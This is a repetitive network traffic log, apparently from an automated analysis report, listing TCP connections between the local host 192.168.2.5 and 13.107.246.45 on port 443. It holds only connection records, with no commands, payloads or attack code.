Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:49722
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52504
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52505
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52506
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52508
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52507
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52510
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52513
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52512
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52511
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.5:52509
